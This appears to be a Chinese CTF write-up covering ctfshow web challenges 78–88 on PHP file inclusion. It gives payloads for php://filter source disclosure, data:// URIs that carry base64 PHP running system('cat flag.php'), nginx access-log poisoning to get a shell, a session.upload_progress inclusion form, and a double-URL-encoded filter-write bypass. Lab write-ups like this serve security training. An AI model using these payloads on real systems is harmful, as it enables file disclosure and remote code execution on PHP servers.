1. web78

PHP伪协议读取

?file=php://filter/convert.base64-encode/resource=flag.php

2. web79

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

然后查看源代码

3. web80-81

包含日志文件 进行getshell

日志文件路径:?file=/var/log/nginx/access.log

4. web82-86

利用session.upload_progress进行文件包含

这道题有点像wmctf的make php great again

利用session对话进行文件包含利用

对那道题自己的总结

#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

5. web87

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

php://filter/write=string.rot13/resource=2.php



原因可能是因为php版本太高了这个过滤器不让用了

使用base64绕过

php://filter/write=convert.base64-decode/resource=3.php

通过url双编码

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码

6. web88

发现过滤的还是比较多,但是没有过滤:那我们就可以使用PHP伪协议就是

这里使用的是data://text/plain;base64,poc 其实和79差不多

只是注意的是编码成base64的时候要去掉

base64的内容是 <?php system('cat fl0g.php'); ?>

ctfshow web入门 78-88的文件包含相关推荐

  1. [ctfshow]web入门——文件上传(web156-web163)

    [ctfshow]web入门--文件上传(web156-web163) [ctfshow]web入门--文件上传 [ctfshow]web入门--文件上传(web156-web163) web156 ...

  2. ctfshow web入门-sql注入

    ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...

  3. [ctfshow web入门]常用姿势801-806

    1NDEX 0x00 前言 801 flask pin码计算 谨记!!python 3.8和3.6 pin码生成方式不同 werkzeug版本不同machine-id获取不同 python3.8 pi ...

  4. ctfshow web入门 命令执行 web29~web77 web118~web124

    目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...

  5. CTFShow web入门题刷题记录

    CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998 ...

  6. 无字母数字rce(ctfshow web入门56)

    无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET[' ...

  7. ctfshow web入门-XXE

    ctfshow web入门-XXE web373 题目描述 解题思路 web374 题目描述 解题思路 web375 题目描述 解题思路 web376 题目描述 解题思路 web377 题目描述 解题 ...

  8. ctfshow web入门 反序列化 前篇 254-266

    这里266后面主要是框架,以后在讲 反序列化入门可以参考我写的另一篇很详细的哦~php 反序列化总结 web254 <?phperror_reporting(0); highlight_file ...

  9. CTFSHOW web入门 命令执行+文件包含+PHP特性

    刷题时间记录表 ID 开始时间 结束时间 刷题范围 1 2021.08.23 19:20 2021.08.23 21.30 web41-45 2 2021.08.24 22:16 2021.08.25 ...

最新文章

  1. 微软Azure AI负责人:OpenAI只能在微软云上训练模型,不懂中台
  2. JAVA中的通配符的符号_Linux下的通配符和特殊符号用法详解
  3. php mysql 博客制作_PHP实现简易blog的制作
  4. 域名服务器的配置文档,配置自己的域名服务器
  5. 上海女博士“择偶条件”惹争议,相亲像是在许愿,网友:别做梦了 !
  6. 第十七周项目2-引用作形参
  7. 视频教程-第03章-二进制、八进制、十进制、十六进制之间的转换-网络技术
  8. PTA 7-7 新年倒计时
  9. Docker端口映射只有Ipv6端口导致Ipv4访问不通
  10. Apparent connection leak detected
  11. 30天搞定Java--day6
  12. Fabric.js 铅笔笔刷
  13. 【超简单】利用Python去除图片水印,太神奇了叭,你还不会嘛?(附三种方法)
  14. Android wms粗略介绍
  15. 快来让你的网页色彩绚丽--linear-gradient与radial-gradient
  16. 创建程序编写demo.py文件
  17. 用Raphael在网页中画圆环进度条(简化版)
  18. SAP MM ME56不能为审批后的PR分配货源? 2
  19. goland-gopath
  20. Linux两台主机之间建立信任关系

热门文章

  1. buddypress主题_如何在WordPress 3.0中启用BuddyPress
  2. 读徐小平的《图穷对话录》后感
  3. 英语论文投稿与写作36问 [36 Questions on Publishing and Writing English Journal Articles]
  4. 高阶函数的几种类型与具体实现
  5. 小米路由器获得BSI物联网安全风筝标志认证;IDC最新数据显示浪潮分布式存储增速中国第一 | 全球TMT...
  6. 如何策划新闻稿,低成本实现品牌影响力增长
  7. 前苏联IV-18荧光数码管时钟开发(ИВ-18)
  8. 好分数阅卷3.0_好分数app下载-好分数网查成绩安卓版app v3.6.4.1-清风安卓软件网...
  9. 2017.08.20【NOIP提高组】模拟赛B组 【NOIP2014八校联考第4场第2试10.20】星球联盟(alliance)...
  10. BCS2022|齐向东:“零事故”将成为网络安全建设新目标